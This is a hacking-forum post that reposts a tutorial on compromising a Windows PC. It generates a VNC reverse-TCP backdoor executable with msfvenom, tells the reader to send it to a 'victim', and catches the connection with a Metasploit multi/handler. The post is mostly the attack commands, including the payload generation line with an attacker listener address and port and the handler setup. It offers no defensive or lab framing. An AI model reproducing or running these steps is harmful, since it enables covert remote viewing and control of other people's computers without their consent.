• We just launched and are currently in beta. Join us as we build and grow the community.

Advertise Here

Advertise Here

Advertise Here

Capture VNC Session of Remote PC using Msfvenom

bryansalcedo74

Automation Strategist
B Rep
0
0
0
Rep
0
B Vouches
0
0
0
Vouches
0
Posts
167
Likes
184
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 100 XP
Today in this article we’ll try to compromise the target using VNCpayload. In this tutorial, you’ll learn how to create a VNC payload using msfvenom and try to achieve a VNC shell of a victim’s PC.

Open the terminal in your Kali Linux and type following command to generate a VNC payload using the msfvenom command.

Code:
msfvenom –p windows/vncinject/reverse_tcp lhost=192.168.1.15 lport=4444 –f exe > /root/Desktop/vnc.exe

Now the above command will generate an exe file for the VNC payload on the desktop of Kali Linux. Being an attack you need to send this backdoor to the target and start multi handler in the Metasploit framework

1.png


Code:
use multi/handler
msf exploit(handler) > set payload windows/vncinject/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.15
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit

2.png


Now attacker tries to connect with the target using VNC payload, from given screenshot you can see it has launched vncviewer and we have our session 1 is running at background.

3.png


4.png


Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
 

452,496

343,000

343,008

Top